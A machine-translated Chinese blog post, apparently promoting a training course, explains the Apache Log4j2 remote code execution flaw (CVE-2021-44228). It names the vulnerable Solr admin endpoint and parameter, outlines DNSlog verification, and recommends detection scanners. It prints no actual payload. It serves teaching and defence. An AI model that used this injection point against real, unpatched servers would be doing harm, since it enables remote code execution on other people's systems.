当前位置:网站首页>How to view Apache log4j 2 remote code execution vulnerability?
How to view Apache log4j 2 remote code execution vulnerability?
2022-07-05 21:50:00 【Blue bridge cloud class】
Apache Log4j2 Is a first-class Java Log framework , A large number of business frameworks use this component .
2021 year 11 month 24 Japan , Alibaba cloud security team to Apache The official report Apache Log4j2 Remote code execution vulnerability , This loophole Trigger condition low , Great harm .
12 month 10 Early morning ,Apache Open source project Log4j Remote Code Execution Vulnerability of Details are made public , because Apache Log4j2 Some functions have recursive parsing function , Attackers can directly construct malicious requests , Trigger Remote Code Execution Vulnerability .
CVE Number :CVE-2021-44228
Affected version :log4j2 2.0-beta9~2.14.1
As soon as this news comes out , It makes it difficult for many safety engineers to sleep , Immediately get up and enter “ Combat Defense status ”. This reminds me of the recent epidemic in Zhejiang , The medical staff rushed in overnight “ Combat status ”.
(PS: There has been a high incidence of the epidemic recently , Friends must wash their hands frequently 、 With mask 、 Don't run around !)
In addition to the safety personnel of various enterprises , Major safety manufacturers also immediately started Verification of vulnerability authenticity , And urgently notify users to upgrade rules to resist the latest vulnerabilities , Avoid serious spread of vulnerability hazards .
How serious is it ? Let me just say one , Feel for yourself :
Enterprise patching may take several hours , Even to It took several days , But hacking , But only need A few minutes Time ! Is patching faster , Or hackers attack faster , I don't need to say more ?
Apache Log4j2 Not a specific Web service , But a third-party logging framework for processing logs ( library ), whatever Java Web It is possible to use this logging framework , Use Log4j2 It's really super much , Too many to count .
I really need to count one or two , It's better to count without using Log4j2 Come faster . As one can imagine , After being attacked , How wide is the coverage .
How about Reproduce this loophole , And fix it ?
We can do a lot based on Java Developed Web service To reproduce this loophole , As long as the service uses log4j2 library ( Versions within the scope of vulnerability ) that will do , such as Apache Solr .
The method of triggering the vulnerability is very simple , Only need to Solr Administrator interface action Parameter sending Payload , Because the interface will call log4j Log , Therefore, the vulnerability execution will be triggered . The interface is as follows :
http://127.0.0.1:8983/solr/admin/cores?action=
Next use DNSlog To construct a verification Payload.
DNS Log For most students of penetration test , Should be familiar with , It is often used to test the loopholes of blind typing and blind injection .
If you don't know , It can be simply understood as : We get a temporary domain name , If the remote server tries to access the domain name , Will be in DNS Leave access records on , At this time, we can get some out of pocket information by querying the record .
Yes, of course , DNS log Just as one of the ways to verify the existence of vulnerabilities , Is not the only solution .
Blue bridge cloud class Slightly rubbed a heat picture , Launched 《 Apache Log4j 2 Detailed explanation of Remote Code Execution Vulnerability 》, use Hands-on experiment To help you reproduce Apache Log4j2 Remote code execution vulnerability .
This course will introduce this vulnerability in detail principle 、 Utilization mode 、 Excavation method and repair method , It also includes hands-on Online experimental environment , Understand the loopholes more deeply .
The key is coming. ! Immediately , Learn for free !
Apache Log4j 2 Remote code execution vulnerability
Now? , Let's talk about the loopholes Mining methods and tools .
Vulnerability mining can be carried out from White box and black box From two angles :
- If you are reviewing whether your application is affected by log4j2 Holes affect , White box testing is the way you should first choose , It can help you do the most comprehensive inspection from the source code level .
- Black box testing has great uncertainty , Because from a black box perspective , Any parameter may trigger log4j2 Loophole . Therefore, the accuracy of black box test , A large part depends on whether the parameters tested are comprehensive .
I recommend two tools , For your reference :
1、 The following tool is recommended for white box testing to scan the source code :
CVE-2021-44228-Scanner
You can download the corresponding version according to the platform :
2、 The following tool is recommended for black box testing :
BurpSuite Pro plug-in unit
open BurpSuite Pro, Switch to Extender -> BApp Store, Search in the search box on the right log4, You can see two plug-ins ( end 2021 year 12 month 22 Japan ):
- log4shell Everywhere: Passive scanning plug-in
- log4Shell Scanner: Active scanning plug-in
Install the above two plug-ins respectively , And then in Active Scan and Passive Scan It will automatically check log4j Loophole , If a loophole is found , The result will be Dashboard Show in .
Okay , Today's Apache Log4j 2 Remote code execution vulnerabilities are shared here . If you want to duplicate this vulnerability , And practice by yourself , You can poke the link below for free ~
Apache Log4j 2 Remote code execution vulnerability
边栏推荐
- Deeply convinced plan X - network protocol basic DNS
- PIP install beatifulsoup4 installation failed
- Poj3414广泛搜索
- Defect detection - Halcon surface scratch detection
- 事项研发工作流全面优化|Erda 2.2 版本如“七”而至
- Teach yourself to train pytorch model to Caffe (I)
- 【愚公系列】2022年7月 Go教学课程 004-Go代码注释
- Selenium finds the contents of B or P Tags
- Poj 3237 Tree (Tree Chain Split)
- POJ 3237 tree (tree chain splitting)
猜你喜欢
Haas506 2.0 development tutorial - Alibaba cloud OTA - PAC firmware upgrade (only supports versions above 2.2)
Huawei cloud modelarts text classification - takeout comments
Uni app Bluetooth communication
Cold violence -- another perspective of objective function setting
总结出现2xx、3xx、4xx、5xx状态码的原因
Huawei game multimedia service calls the method of shielding the voice of the specified player, and the error code 3010 is returned
EBS Oracle 11g 克隆步骤(单节点)
Incentive mechanism of Ethereum eth
Interviewer: will concurrent programming practice meet? (detailed explanation of thread control operation)
What should I do to prepare for the interview algorithm position during school recruitment?
随机推荐
1.2 download and installation of the help software rstudio
Chapter 05_ Storage engine
Experienced inductance manufacturers tell you what makes the inductance noisy. Inductance noise is a common inductance fault. If the used inductance makes noise, you don't have to worry. You just need
Zhang Lijun: penetrating uncertainty depends on four "invariants"
Tips for using SecureCRT
MMAP
Image editor for their AutoLayout environment
SQL common syntax records
MySQL InnoDB Architecture Principle
Objects in the list, sorted by a field
Selenium finds the contents of B or P Tags
EasyExcel的讀寫操作
854. String BFS with similarity K
Comprehensive optimization of event R & D workflow | Erda version 2.2 comes as "7"
总结出现2xx、3xx、4xx、5xx状态码的原因
An exception occurred in Huawei game multimedia calling the room switching method internal system error Reason:90000017
Matlab | app designer · I used Matlab to make a real-time editor of latex formula
The primary key is set after the table is created, but auto increment is not set
854. 相似度为 K 的字符串 BFS
Implementing Lmax disruptor queue from scratch (IV) principle analysis of multithreaded producer multiproducersequencer